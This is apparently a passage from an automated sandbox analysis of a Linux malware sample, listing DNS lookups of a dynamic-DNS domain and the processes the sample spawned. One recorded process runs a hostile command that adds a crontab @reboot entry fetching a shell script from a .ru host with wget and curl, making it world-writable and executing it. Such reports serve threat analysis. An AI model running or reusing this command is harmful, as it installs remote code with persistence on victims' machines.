                                              Dec 17, 2024 15:18:25.263470888 CET5178153192.168.2.23202.61.197.122
                                              Dec 17, 2024 15:18:25.553378105 CET5351781202.61.197.122192.168.2.23
                                              Dec 17, 2024 15:18:34.965770006 CET3970953192.168.2.23178.254.22.166
                                              Dec 17, 2024 15:18:39.969077110 CET4330753192.168.2.23137.220.52.23
                                              Dec 17, 2024 15:18:44.974376917 CET6008953192.168.2.2351.158.108.203
                                              Dec 17, 2024 15:18:49.981177092 CET4297253192.168.2.23217.160.70.42
                                              Dec 17, 2024 15:18:50.218965054 CET5342972217.160.70.42192.168.2.23
                                              Dec 17, 2024 15:19:05.648499012 CET4876653192.168.2.235.161.109.23
                                              Dec 17, 2024 15:19:10.652637959 CET5450953192.168.2.23168.235.111.72
                                              Dec 17, 2024 15:19:10.962188959 CET5354509168.235.111.72192.168.2.23
                                              Dec 17, 2024 15:19:17.558130026 CET4394853192.168.2.23202.61.197.122
                                              Dec 17, 2024 15:19:17.799712896 CET5343948202.61.197.122192.168.2.23
                                              Dec 17, 2024 15:19:24.399821043 CET4501853192.168.2.2365.21.1.106
                                              Dec 17, 2024 15:19:24.664244890 CET534501865.21.1.106192.168.2.23
                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Dec 17, 2024 15:17:57.697324038 CET192.168.2.23185.181.61.240xbfbaStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                              Dec 17, 2024 15:18:04.563355923 CET192.168.2.2365.21.1.1060x9cadStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                              Dec 17, 2024 15:18:20.257036924 CET192.168.2.235.161.109.230xc33dStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                              Dec 17, 2024 15:18:25.263470888 CET192.168.2.23202.61.197.1220xef5dStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                              Dec 17, 2024 15:18:34.965770006 CET192.168.2.23178.254.22.1660x2d1Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                              Dec 17, 2024 15:18:39.969077110 CET192.168.2.23137.220.52.230x792fStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                              Dec 17, 2024 15:18:44.974376917 CET192.168.2.2351.158.108.2030x8326Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                              Dec 17, 2024 15:18:49.981177092 CET192.168.2.23217.160.70.420x6853Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                              Dec 17, 2024 15:19:05.648499012 CET192.168.2.235.161.109.230x60c8Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                              Dec 17, 2024 15:19:10.652637959 CET192.168.2.23168.235.111.720x690bStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                              Dec 17, 2024 15:19:17.558130026 CET192.168.2.23202.61.197.1220xc4a8Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                              Dec 17, 2024 15:19:24.399821043 CET192.168.2.2365.21.1.1060x37eaStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Dec 17, 2024 15:17:57.959239006 CET185.181.61.24192.168.2.230xbfbaNo error (0)kingstonwikkerink.dyn80.78.26.121A (IP address)IN (0x0001)false
                                              Dec 17, 2024 15:17:57.959239006 CET185.181.61.24192.168.2.230xbfbaNo error (0)kingstonwikkerink.dyn212.64.215.71A (IP address)IN (0x0001)false
                                              Dec 17, 2024 15:17:58.147958040 CET185.181.61.24192.168.2.230xbfbaFormat error (1)kingstonwikkerink.dynnonenoneA (IP address)IN (0x0001)false
                                              Dec 17, 2024 15:17:58.395908117 CET202.61.197.122192.168.2.230xb5dcFormat error (1)kingstonwikkerink.dynnonenoneA (IP address)IN (0x0001)false
                                              Dec 17, 2024 15:17:58.657967091 CET185.181.61.24192.168.2.230xebebFormat error (1)kingstonwikkerink.dynnonenoneA (IP address)IN (0x0001)false
                                              Dec 17, 2024 15:18:04.827590942 CET65.21.1.106192.168.2.230x9cadNo error (0)kingstonwikkerink.dyn80.78.26.121A (IP address)IN (0x0001)false
                                              Dec 17, 2024 15:18:04.827590942 CET65.21.1.106192.168.2.230x9cadNo error (0)kingstonwikkerink.dyn212.64.215.71A (IP address)IN (0x0001)false
                                              Dec 17, 2024 15:18:25.553378105 CET202.61.197.122192.168.2.230xef5dNo error (0)kingstonwikkerink.dyn212.64.215.71A (IP address)IN (0x0001)false
                                              Dec 17, 2024 15:18:25.553378105 CET202.61.197.122192.168.2.230xef5dNo error (0)kingstonwikkerink.dyn80.78.26.121A (IP address)IN (0x0001)false
                                              Dec 17, 2024 15:18:50.218965054 CET217.160.70.42192.168.2.230x6853No error (0)kingstonwikkerink.dyn80.78.26.121A (IP address)IN (0x0001)false
                                              Dec 17, 2024 15:18:50.218965054 CET217.160.70.42192.168.2.230x6853No error (0)kingstonwikkerink.dyn212.64.215.71A (IP address)IN (0x0001)false
                                              Dec 17, 2024 15:19:10.962188959 CET168.235.111.72192.168.2.230x690bNo error (0)kingstonwikkerink.dyn212.64.215.71A (IP address)IN (0x0001)false
                                              Dec 17, 2024 15:19:10.962188959 CET168.235.111.72192.168.2.230x690bNo error (0)kingstonwikkerink.dyn80.78.26.121A (IP address)IN (0x0001)false
                                              Dec 17, 2024 15:19:17.799712896 CET202.61.197.122192.168.2.230xc4a8No error (0)kingstonwikkerink.dyn80.78.26.121A (IP address)IN (0x0001)false
                                              Dec 17, 2024 15:19:17.799712896 CET202.61.197.122192.168.2.230xc4a8No error (0)kingstonwikkerink.dyn212.64.215.71A (IP address)IN (0x0001)false
                                              Dec 17, 2024 15:19:24.664244890 CET65.21.1.106192.168.2.230x37eaNo error (0)kingstonwikkerink.dyn212.64.215.71A (IP address)IN (0x0001)false
                                              Dec 17, 2024 15:19:24.664244890 CET65.21.1.106192.168.2.230x37eaNo error (0)kingstonwikkerink.dyn80.78.26.121A (IP address)IN (0x0001)false

                                              System Behavior

                                              Start time (UTC):14:17:52
                                              Start date (UTC):17/12/2024
                                              Path:/usr/bin/dash
                                              Arguments:-
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time (UTC):14:17:52
                                              Start date (UTC):17/12/2024
                                              Path:/usr/bin/rm
                                              Arguments:rm -f /tmp/tmp.3IVLCyEXtn /tmp/tmp.TBRSZCPExN /tmp/tmp.0oqxZm1t35
                                              File size:72056 bytes
                                              MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                              Start time (UTC):14:17:52
                                              Start date (UTC):17/12/2024
                                              Path:/usr/bin/dash
                                              Arguments:-
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time (UTC):14:17:52
                                              Start date (UTC):17/12/2024
                                              Path:/usr/bin/rm
                                              Arguments:rm -f /tmp/tmp.3IVLCyEXtn /tmp/tmp.TBRSZCPExN /tmp/tmp.0oqxZm1t35
                                              File size:72056 bytes
                                              MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                              Start time (UTC):14:17:56
                                              Start date (UTC):17/12/2024
                                              Path:/tmp/nshkarm.elf
                                              Arguments:/tmp/nshkarm.elf
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Start time (UTC):14:17:57
                                              Start date (UTC):17/12/2024
                                              Path:/tmp/nshkarm.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Start time (UTC):14:17:57
                                              Start date (UTC):17/12/2024
                                              Path:/bin/sh
                                              Arguments:sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time (UTC):14:17:57
                                              Start date (UTC):17/12/2024
                                              Path:/bin/sh
                                              Arguments:-
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time (UTC):14:17:57
                                              Start date (UTC):17/12/2024
                                              Path:/bin/sh
                                              Arguments:-
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time (UTC):14:17:57
                                              Start date (UTC):17/12/2024
                                              Path:/usr/bin/crontab
                                              Arguments:crontab -l
                                              File size:43720 bytes
                                              MD5 hash:66e521d421ac9b407699061bf21806f5

                                              Start time (UTC):14:17:57
                                              Start date (UTC):17/12/2024
                                              Path:/bin/sh
                                              Arguments:-
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time (UTC):14:17:57
                                              Start date (UTC):17/12/2024
                                              Path:/usr/bin/crontab
                                              Arguments:crontab -
                                              File size:43720 bytes
                                              MD5 hash:66e521d421ac9b407699061bf21806f5

                                              Start time (UTC):14:17:57
                                              Start date (UTC):17/12/2024
                                              Path:/tmp/nshkarm.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Start time (UTC):14:17:57
                                              Start date (UTC):17/12/2024
                                              Path:/tmp/nshkarm.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Start time (UTC):14:17:57
                                              Start date (UTC):17/12/2024
                                              Path:/tmp/nshkarm.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1